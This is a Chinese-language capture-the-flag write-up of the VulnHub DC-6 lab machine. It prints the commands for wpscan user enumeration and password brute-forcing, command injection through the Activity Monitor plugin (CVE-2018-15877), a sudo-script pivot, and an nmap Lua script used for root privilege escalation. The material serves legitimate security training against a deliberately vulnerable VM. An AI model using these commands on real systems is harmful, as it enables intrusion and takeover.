DC-6

靶机介绍

  靶机下载地址:https://download.vulnhub.com/dc/DC-6.zip

环境搭建

  下载之后,解压,使用vmware导入或者virtualbox导入都可以,但注意要保证与你的攻击机在同一网段下,vmware要使用最新版

  kali攻击机:192.168.98.136

靶机渗透

信息收集

扫描主机

arp-scan -l

image

  靶机ip地址为:192.168.98.144

扫描端口

masscan --rate=100000 -p 0-65535 192.168.98.144

image

  80、22端口开放

image

  22端口是ssh服务,80端口开放了一个网站

  访问192.168.98.144发现访问不了,这里需要改下本地的dns

# linux:
vim /etc/hosts
# windows:
C:\Windows\System32\drivers\etc\hosts

image

  爆破一下ssh(爆破未成功)

nmap --script=ssh-brute 192.168.98.144

  ‍

  ‍

  指纹识别​imageWordPress 5.1.1

目录扫描

dirsearch -u http://192.168.98.144 -i 200,300-399,403

image

image

[15:14:23] 403 -  300B  - /.ht_wsr.txt
[15:14:23] 403 -  303B  - /.htaccess.bak1
[15:14:23] 403 -  303B  - /.htaccess.orig
[15:14:23] 403 -  303B  - /.htaccess.save
[15:14:23] 403 -  305B  - /.htaccess.sample
[15:14:23] 403 -  304B  - /.htaccess_extra
[15:14:23] 403 -  303B  - /.htaccess_orig
[15:14:23] 403 -  301B  - /.htaccess_sc
[15:14:23] 403 -  301B  - /.htaccessOLD
[15:14:23] 403 -  302B  - /.htaccessOLD2
[15:14:23] 403 -  301B  - /.htaccessBAK
[15:14:23] 403 -  293B  - /.htm
[15:14:23] 403 -  294B  - /.html
[15:14:23] 403 -  303B  - /.htpasswd_test
[15:14:23] 403 -  299B  - /.htpasswds
[15:14:23] 403 -  300B  - /.httr-oauth
[15:14:25] 403 -  294B  - /.php3
[15:14:25] 403 -  293B  - /.php
[15:15:07] 200 -   18KB - /index.php
[15:15:08] 200 -    7KB - /license.txt
[15:15:23] 200 -    3KB - /readme.html
[15:15:26] 403 -  302B  - /server-status
[15:15:26] 403 -  303B  - /server-status/
[15:15:40] 301 -  319B  - /wp-admin  ->  http://192.168.98.144/wp-admin/
[15:15:40] 200 -    0B  - /wp-config.php
[15:15:40] 302 -    0B  - /wp-admin/  ->  http://wordy/wp-login.php?redirect_to=http%3A%2F%2F192.168.98.144%2Fwp-admin%2F&reauth=1
[15:15:40] 200 -  517B  - /wp-admin/install.php
[15:15:40] 200 -    0B  - /wp-content/
[15:15:40] 301 -  321B  - /wp-content  ->  http://192.168.98.144/wp-content/
[15:15:40] 403 -  327B  - /wp-content/plugins/akismet/akismet.php
[15:15:40] 403 -  325B  - /wp-content/plugins/akismet/admin.php
[15:15:40] 301 -  322B  - /wp-includes  ->  http://192.168.98.144/wp-includes/
[15:15:40] 200 -    4KB - /wp-includes/
[15:15:40] 200 -    0B  - /wp-cron.php
[15:15:41] 200 -    1KB - /wp-login.php
[15:15:41] 302 -    0B  - /wp-signup.php  ->  http://wordy/wp-login.php?action=register

漏洞挖掘

wps扫描用户名

wpscan --url http://wordy --enumerate u

  将用户名保存到 username.txt文件中

image

admin
graham
mark
sarah
jens

  然后有个提示,不看答案的话,几乎做不了这个题
提示地址:https://www.vulnhub.com/entry/dc-6,315/

image

cat /usr/share/wordlists/rockyou.txt | grep k01 > password.txt

  然后进行爆破

wpscan --url http://wordy/ -U username.txt -P password.txt

image

  爆破出来一个账户

Username: mark
Password: helpdesk01

  成功登录后台:http://wordy/wp-admin/

image

  ‍

Activity Monitor(CVE-2018-15877)远程命令执行

  在逛了一圈之后没发现可以写入shell的地方,注意这里有个插件:Activity monitor,这里存在远程命令执行漏洞!

image

  补充:

  • CVE-2018-15877漏洞是一个WordPress 插件Plainview Activity Monitor存在远程命令执行的漏洞。Plainview Activity Monitor 是一款网站用户活动监控插件。远程攻击者可以通过构造的url来诱导wordpress管理员来点击恶意链接最终导致远程命令执行。

  通过在正常命令后加 ‘| ls ’ 来执行我们想要的命令

image

image

  发现只能输入一半进去,应该是开发者限制了输入的字数

  打开F12,找到maxlength,修改为150 或者直接用bp抓包:

  靶机存在nc命令

image

  直接用nc反弹shell:

image

  kali成功监听:

image

ssh登录graham账户

  老规矩先去看看passwd和home目录下有什么敏感文件,在home/mark/stuff/things-to-do.txt​文件下发现了这句话

image

账号:graham
密码:GSo7isUM1D4

  尝试去登录:

image

  成功用ssh登录上账户graham ,但是当我去尝试登录后台时失败了

通过特定权限脚本切换账户

  尝试suid提取,发现没有可利用的

find / -perm -u=s -type f 2>/dev/null

  查看当前用户可执行操作

sudo -l                                  

image

  ​backups.sh​是一个解压的脚本

image

  向其中写入命令然后以 jens账户来执行

echo "/bin/bash" >> /home/jens/backups.sh
sudo -u jens /home/jens/backups.sh

image

  成功切换到 jens 用户

nmap提权

  继续查看可执行命令:

sudo -l

image

  发现可以利用nmap命令提权

  nmap提权有2中方式:

  1. 要求:nmap有s标志位,nmap版本足够老
    nmap老版本支持“interactive.”选项,用户能够通过该选项执行shell命令

    sudo nmap --interactive 即可得到交互式shell
    然后在nmap交互模式下键入!bash,即可得到bash的root权限

    • !bash or !sh
    • whoami
  2.  TF=$(mktemp)
     echo 'os.execute("/bin/sh")' > $TF
     sudo nmap --script=$TF
    

  ‍

  第一种无法使用,版本不够老,直接使用第二种,拿到root权限:

image

  由于输入的内容没有显示出来,直接使用python开启一个标准的shell

python -c "import pty;pty.spawn('/bin/bash')"

image

拿下flag

  寻找flag

find / -name *flag*

image

cat /root/theflag.txt

image

  ‍

总结

  1. 熟悉使用wps工具来枚举用户名和爆破密码
  2. Activity Monitor(CVE-2018-15877)远程命令执行漏洞利用
  3. 通过特定权限脚本切换账户
  4. nmap提权

  ‍

  ‍

posted @ 2024-08-20 15:51  itchen-2002  阅读(8)  评论(0编辑  收藏  举报